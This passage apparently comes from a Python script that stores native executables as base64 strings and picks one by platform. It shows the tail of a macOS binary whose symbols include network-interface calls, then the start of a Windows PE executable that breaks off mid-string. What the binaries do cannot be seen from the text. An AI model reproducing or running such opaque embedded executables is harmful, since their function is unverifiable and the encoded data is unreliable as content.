VF8AX19aTlNpNHJlYWRFUGNsAF9fWk5TaTVzZWVrZ0V4U3QxMl9Jb3NfU2Vla2RpcgBfX1pOU2k1dGVsbGdFdgBfX1pOU28zcHV0RWMAX19aTlNvNWZsdXNoRXYAX19aTlNvNXdyaXRlRVBLY2wAX19aTlNvOV9NX2luc2VydEltRUVSU29UXwBfX1pOU29sc0VpAF9fWk5TczEyX01fbGVha19oYXJkRXYAX19aTlNzNF9SZXAxMF9NX2Rlc3Ryb3lFUktTYUljRQBfX1pOU3M0X1JlcDExX1NfdGVybWluYWxFAF9fWk5TczRfUmVwMjBfU19lbXB0eV9yZXBfc3RvcmFnZUUAX19aTlNzNF9SZXA5X1NfY3JlYXRlRW1tUktTYUljRQBfX1pOU3M1ZXJhc2VFbW0AX19aTlNzNmFwcGVuZEVQS2NtAF9fWk5TczZhcHBlbmRFUktTcwBfX1pOU3M2YXNzaWduRVBLY20AX19aTlNzNmFzc2lnbkVSS1NzAF9fWk5
TczlfTV9tdXRhdGVFbW1tAF9fWk5TczlwdXNoX2JhY2tFYwBfX1pOU3NDMUVQS2NSS1NhSWNFAF9fWk5Tc0MxRVBLY21SS1NhSWNFAF9fWk5Tc0MxRVJLU3MAX19aTlNzRDJFdgBfX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFNWNsb3NlRXYAX19aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9fWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGUAX19aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXYAX19aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2AF9fWk5TdDhpb3NfYmFzZTRJbml0QzFFdgBfX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX19aTlN0OWJhc2ljX2lvc0ljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbGVhckVTdDEyX0lvc19Jb3N0YXRlAF9fWlN0MTZfX29zdHJlYW1faW5zZXJ0SWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2X1BLUzNfbABfX1pTdDE5X190aHJvd19sb2dpY19lcnJvclBLYwBfX1pTdDRjb3V0AF9fWlN0OXRlcm1pbmF0ZXYAX19aZGFQdgBfX1puYW0AX19fY3hhX2F0ZXhpdABfX19jeGFfYmVnaW5fY2F0Y2gAX19fY3hhX2VuZF9jYXRjaABfX19neHhfcGVyc29uYWxpdHlfdjAAX19fc3RhY2tfY2hrX2ZhaWwAX19fc3RhY2tfY2hrX2d1YXJkAF9hdG9pAF9hdG9sAF9leGl0AF9mcmVlaWZhZGRycwBfZ2V0aWZhZGRycwBfbWVtY3B5AF9tZW1zZXRfcGF0dGVybjE2AF9zcHJpbnRmAF9zdHJjbXAAX3N0cmNweQBfc3RybGVuAGR5bGRfc3R1Yl9iaW5kZXIAAAAAAA==')
return R
if a.__isWindows():
R = at(
'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